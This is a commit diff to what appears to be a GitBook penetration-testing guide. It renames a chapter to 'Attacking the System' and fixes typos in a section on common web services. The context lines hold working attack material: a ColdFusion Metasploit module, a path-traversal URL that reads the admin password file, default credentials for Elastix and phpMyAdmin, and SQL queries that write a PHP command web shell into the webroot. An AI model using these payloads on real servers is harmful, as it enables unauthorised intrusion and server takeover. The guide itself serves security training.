Commit 8a072563 authored by bobloblaw's avatar bobloblaw
Browse files

Updates lead_to_compromise.md 

Auto commit by GitBook Editor
parent 04e66a19

SUMMARY.md

+1 −1
Original line number Diff line number Diff line
@@ -37,7 +37,7 @@ 
    * [HTTP - Web Vulnerabilities](web-services.md)

        * [Common web-services](common_web-services.md)

        * [WAF - Web application firewall](waf_-_web_application_firewall.md)

        * [Attacking the system](lead_to_compromise.md)

        * [Attacking the System](lead_to_compromise.md)

            * [Local file inclusion](local_file_inclusion.md)

            * [Remote file inclusion](remote_file_inclusion.md)

            * [Hidden Files and Directories](web-scanning.md)

common_web-services.md

+7 −3
Original line number Diff line number Diff line
@@ -21,6 +21,7 @@ It will say something like: 




This works for version 8.0.1. So make sure to check the exact version.



```

use exploit/windows/http/coldfusion_fckeditor

```
@@ -28,6 +29,7 @@ use exploit/windows/http/coldfusion_fckeditor 
#### LFI



This will output the hash of the password. 



```

http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

```
@@ -44,11 +46,11 @@ neo-security.xml and password.properties 


## Elastix



Full of vulnerabilites. The old versions at least.

Full of vulnerabilities. The old versions at least.



http://example.com/vtigercrm/

default login is

admin:admin

`admin:admin`



You might be able to upload shell in profile-photo.
@@ -56,7 +58,7 @@ You might be able to upload shell in profile-photo. 


## Phpmyadmin



Default credencials

Default credentials



```

root <blank>
@@ -78,12 +80,14 @@ Run SQL query/queries on server "localhost": 
From here we can just run a sql-query that creates a php script that works as a shell



So we add the following query:



```

SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\shell.php"



# For linux

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php"

```



The query is pretty self-explanatory. Now you just visit `192.168.1.101/shell.php?cmd=ipconfig` and you have a working web-shell.

We can of course just write a superlong query with a better shell. But sometimes it is easier to just upload a simple web-shell, and from there download a better shell.

lead_to_compromise.md

+2 −2
Original line number Diff line number Diff line 
# Lead to compromise

# Attacking the System



I know it is dubious to divide this up. Because in a sense most can be a starting vector to a complete compromise.

I have divided the web-vulnerabilites into two categories: **Attacking the System** and **Attacking the User**. I know this might seem like a pretty weird categorization, but I think it make sense. So in this chapter we will look at vulnerabilities that primarily focus on the webserver, and not the visiting users.